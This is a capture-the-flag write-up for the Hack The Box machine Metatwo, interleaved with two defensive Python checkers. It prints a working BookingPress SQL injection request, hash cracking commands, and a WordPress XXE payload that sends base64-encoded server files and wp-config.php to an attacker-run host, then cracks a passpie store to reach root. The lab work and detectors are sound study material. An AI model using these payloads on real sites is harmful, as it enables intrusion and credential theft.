Lab notes: HTB Metatwo

1. Routine nmap scan

  • Ports 21, 22 and 80 are open.

2. Port 80

  • Visiting the site on port 80 shows that it runs WordPress.

  • A WPScan run turns up nothing useful.

  • The page source shows that the site uses the bookingpress plugin.

  • A search shows that bookingpress has a SQL injection vulnerability.
    Reference: https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357 (CVE-2022-0739)

    sudo curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=5a84303f70&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'


  • Adding -x http://127.0.0.1:8080 routes the request through Burp for manual injection; sqlmap is the other option, and it is used here for convenience:
    sqlmap -r surp.txt -p total_service
    This dumps the usernames and password hashes from the database; the hashes still have to be cracked.

  • Crack the hashes with hashcat. The $P$ prefix corresponds to hashcat mode 400 (phpass):
    sudo hashcat -m 400 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
    Result: $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70:partylikearockstar

  • The credentials fail against both SSH and FTP. A directory scan finds the admin login page, and manager:partylikearockstar logs in successfully.
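Added example, not code from the writeup or from the plugin: a request-side check modelling how a WAF or the plugin's own input handling should treat this endpoint. The `category_id` and `total_service` parameters are only ever legitimate as bare integers, so anything else in them is flagged. The function name and the sample bodies are constructed for this illustration; the first body is the request shown above.

```python
import re
from urllib.parse import parse_qs

VULN_ACTION = "bookingpress_front_get_category_services"
INT_PARAMS = ("category_id", "total_service")   # legitimate only as bare integers
_INT = re.compile(r"\d{1,10}")
_SQL_HINTS = re.compile(r"(?i)\bunion\b|\bselect\b|--|/\*|@@|\bsleep\s*\(")

def inspect_admin_ajax_body(body: str) -> list[str]:
    """Return findings for one admin-ajax.php POST body (empty list = clean)."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if params.get("action") != VULN_ACTION:
        return []                           # some other AJAX action; not in scope
    findings = []
    for name in INT_PARAMS:
        value = params.get(name, "")
        if _INT.fullmatch(value):
            continue                        # plain integer: what the plugin expects
        reason = "sql keywords" if _SQL_HINTS.search(value) else "non-integer"
        findings.append(f"{name}: {reason} ({value[:40]!r})")
    return findings

# Constructed sample bodies; the first is the injection request shown above.
ATTACK_BODY = ("action=bookingpress_front_get_category_services&_wpnonce=5a84303f70"
               "&category_id=33&total_service=-7502) UNION ALL SELECT @@version,"
               "@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -")
BENIGN_BODY = ("action=bookingpress_front_get_category_services&_wpnonce=5a84303f70"
               "&category_id=33&total_service=4")

if __name__ == "__main__":
    for body in (ATTACK_BODY, BENIGN_BODY):
        print(inspect_admin_ajax_body(body) or "clean")
```

The equivalent fix inside the plugin is to cast these parameters to integers (WordPress's absint()) before they reach the query, rather than interpolating them as strings.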

3. Exploiting the WordPress XXE vulnerability

Searching for the WordPress version number shows that this version has an XXE vulnerability (CVE-2021-29447).
Reference: https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/

  • Host the DTD file on a web server:

    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
    <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.7:9999/?p=%file;'>" >

  • Generate payload.wav:

    echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?>%remote;%init;%trick;]>\x00' > payload.wav

  • Serve it with PHP's built-in web server:

    php -S 0.0.0.0:9999

  • Upload payload.wav. On success the server returns /etc/passwd base64-encoded; decode it with the base64 tool that ships with Kali:

    echo -n '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' | base64 -d > passwd

  • The decoded file shows a user named jnelson; trying the known password against that account (password reuse) gets nowhere.

    cat passwd | grep /bin/bash
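Added example, not WordPress or getID3 code: a pre-upload scanner that walks the RIFF chunks of a WAV file and rejects any iXML chunk carrying a DOCTYPE, an entity declaration, an external identifier or a parameter-entity reference, which is the shape of the payload used above. The function names, the `attacker.invalid` URL and the sample files are constructed for this illustration. It also clamps a declared chunk length that runs past the end of the file, as in the hand-built payload above, so a malformed header does not let the chunk escape inspection.

```python
import re
import struct

# XML constructs that have no business in audio metadata.
_SUSPICIOUS = [
    (re.compile(rb"<!DOCTYPE", re.I), "DOCTYPE declaration"),
    (re.compile(rb"<!ENTITY", re.I), "ENTITY declaration"),
    (re.compile(rb"\b(SYSTEM|PUBLIC)\s+['\"]", re.I), "external identifier"),
    (re.compile(rb"%[A-Za-z_][\w.-]*;"), "parameter-entity reference"),
]

def riff_chunks(data: bytes):
    """Yield (chunk_id, payload) for a RIFF/WAVE blob, tolerating bad sizes."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return
    pos = 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        start = pos + 8
        end = min(start + size, len(data))   # clamp a declared length past EOF
        yield cid, data[start:end]
        if end == len(data):
            return
        pos = end + (size & 1)               # chunks are word-aligned

def scan_wav(data: bytes) -> list[str]:
    """Return reasons to reject the upload; an empty list means no iXML red flags."""
    findings = []
    for cid, payload in riff_chunks(data):
        if cid != b"iXML":
            continue
        for pattern, label in _SUSPICIOUS:
            if pattern.search(payload):
                findings.append(f"iXML chunk: {label}")
    return findings

def make_wav(ixml: bytes) -> bytes:
    """Build a minimal WAV holding only an iXML chunk (constructed fixture)."""
    body = b"WAVE" + b"iXML" + struct.pack("<I", len(ixml)) + ixml
    return b"RIFF" + struct.pack("<I", len(body)) + body

# Constructed samples: ordinary metadata, and the entity-bearing shape described above.
CLEAN_WAV = make_wav(b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>')
XXE_WAV = make_wav(b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % remote SYSTEM '
                   b'"http://attacker.invalid/x.dtd">%remote;]><r/>')

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_WAV), ("xxe", XXE_WAV)):
        print(name, scan_wav(blob) or "no findings")
```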

  • The earlier scan showed the site is fronted by Nginx, so the next read is the default Nginx config, which reveals a default site:

    <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/nginx/nginx.conf">
    <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.7:9999/?p=%file;'>" >

  • Read the default site's config, /etc/nginx/sites-enabled/default, which reveals a site named blog:

    ┌──(root㉿kali)-[/home/kali/metatwo]
    └─# echo -en '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' | base64 -d
    server {

        listen 80;
        listen [::]:80;

        root /var/www/metapress.htb/blog;

        index index.php index.html;

        if ($http_host != "metapress.htb") {
                rewrite ^ http://metapress.htb/;
        }

        location / {
                try_files $uri $uri/ /index.php?$args;
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/var/run/php/php8.0-fpm.sock;
        }

        location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg)$ {
                expires max;
                log_not_found off;
        }

    }

  • Read the blog site's configuration file next; it yields the FTP username and password metapress.htb:9NYS_ii@FyL_p5M2NvJ:

    <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/var/www/metapress.htb/blog/wp-config.php">
    <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.7:9999/?p=%file;'>" >

The returned file:

<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'blog' );

/** MySQL database username */
define( 'DB_USER', 'blog' );

/** MySQL database password */
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );

/**#@+
 * Authentication Unique Keys and Salts.
 * @since 2.6.0
 */
define( 'AUTH_KEY',         '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );
define( 'SECURE_AUTH_KEY',  'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );
define( 'LOGGED_IN_KEY',    'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );
define( 'NONCE_KEY',        'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );
define( 'AUTH_SALT',        '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );
define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );
define( 'LOGGED_IN_SALT',   '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );
define( 'NONCE_SALT',       '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );

/**
 * WordPress Database Table prefix.
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

4. FTP

  • Log in to FTP with the credentials just obtained. The root directory holds two folders: blog contains the site source and offers nothing exploitable on analysis; mailer does.

  • The mailer folder contains a file named send_email.php; download it for inspection.

  • send_email.php contains another credential pair, jnelson:Cb4_JmWM8zUZWMu@Ys:

    ┌──(root㉿kali)-[/home/kali/metatwo]
    └─# cat send_email.php

    <?php
    /*
     * This script will be used to send an email to all our users when ready for launch
     */
    use PHPMailer\PHPMailer\PHPMailer;
    use PHPMailer\PHPMailer\SMTP;
    use PHPMailer\PHPMailer\Exception;

    require 'PHPMailer/src/Exception.php';
    require 'PHPMailer/src/PHPMailer.php';
    require 'PHPMailer/src/SMTP.php';

    $mail = new PHPMailer(true);
    $mail->SMTPDebug = 3;
    $mail->isSMTP();
    $mail->Host = "mail.metapress.htb";
    $mail->SMTPAuth = true;
    $mail->Username = "jnelson@metapress.htb";
    $mail->Password = "Cb4_JmWM8zUZWMu@Ys";
    $mail->SMTPSecure = "tls";
    $mail->Port = 587;
    $mail->From = "jnelson@metapress.htb";
    $mail->FromName = "James Nelson";
    $mail->addAddress("info@metapress.htb");
    $mail->isHTML(true);
    $mail->Subject = "Startup";
    $mail->Body = "We just started our new blog metapress.htb!";

    try {
        $mail->send();
        echo "Message has been sent successfully";
    } catch (Exception $e) {
        echo "Mailer Error: " . $mail->ErrorInfo;
    }

5. Privilege escalation

  • SSH in with the credentials just found and collect the first flag.

  • The second flag needs root. Listing the files in the home directory reveals .passpie; a search shows this is a password manager, and it holds the root account's password.

  • The stored passwords are encrypted; research shows the passpie passphrase can be recovered from .keys.

  • Save the private-key part of .keys as rootpass.txt and convert it with gpg2john to rootpass.john:

    ┌──(root㉿kali)-[/home/kali/metatwo]
    └─# gpg2john rootpass.txt > rootpass.john

  • Crack it with john; the passpie passphrase is blink182:

    ┌──(root㉿kali)-[/home/kali/metatwo]
    └─# john -w=/usr/share/wordlists/rockyou.txt rootpass.john

  • Export the plaintext passwords with passpie:

    jnelson@meta2:~$ touch pass
    jnelson@meta2:~$ passpie export pass
    jnelson@meta2:~$ cat pass
    credentials:
    - comment: ''
      fullname: root@ssh
      login: root
      modified: 2022-06-26 08:58:15.621572
      name: ssh
      password: !!python/unicode 'p7qfAZt4_A1xo_0x'
    - comment: ''
      fullname: jnelson@ssh
      login: jnelson
      modified: 2022-06-26 08:58:15.514422
      name: ssh
      password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
    handler: passpie
    version: 1.0

    The root password is p7qfAZt4_A1xo_0x.

  • Switch to root and collect the second flag.
